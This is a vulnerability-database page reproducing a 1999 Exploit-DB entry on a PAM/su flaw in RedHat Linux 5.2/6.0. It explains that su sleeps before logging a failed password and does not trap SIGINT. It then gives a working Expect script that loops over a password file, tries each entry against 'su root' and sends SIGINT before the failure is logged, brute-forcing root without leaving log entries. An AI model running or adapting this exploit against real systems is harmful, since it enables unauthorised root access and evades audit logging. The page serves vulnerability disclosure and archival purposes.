Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RedHat Linux 5.2 i386/6.0 - No Logging

🗓️ 09 Jun 1999 00:00:00Reported by Tani HosokawaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

Vulnerability in PAM allows password brute forcing with no logs via the su command on RedHat Linux.

Code
source: https://www.securityfocus.com/bid/320/info

A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity.

su is a command that allows users to change identifies by supplying a password. If the password is correct su immediately executes a new shell with the identity of the nw user, otherwise it sleeps for a second and then logs an authentication failure to syslog.

Since su sleeps before logging the failure and does not trap SIGINT a user can try a password and if su does not immediately give him a new shell and before one second hits control-c his attempt will not be logged. He can automate the process to brute force passwords.

Its been tested using sh-utils-1.16-14 and pam-0.64-3.

#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) [email protected]

#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember. 
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#    attempt to SU
#          |
#     succesfull
#    /          \
#   Y            N
#   |            |
# exec cmd     sleep
#                |
#             syslog 
#                |
#              exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occured.
#       
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
#     .mudge


if { ($argc < 1) || ($argc > 1) } {
  puts "correct usage is : $argv0 pwfile"
  exit
}

set pwfile [open $argv "r"]

log_user 0
foreach line [split [read $pwfile] "\n"] {
  spawn su root
  expect "Password:"
  send "$line\n"
  # you might need to tweak this but it should be ok
  set timeout 2
  expect {
    "#" { puts "root password is $line\n" ; exit }
  }
  set id [ exp_pid ]
  exec kill -INT $id
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jun 1999 00:00Current
7High risk
Vulners AI Score7
pam vulnerabilitylocal password brute forcingno loggingsu commandredhat linux 5.2
38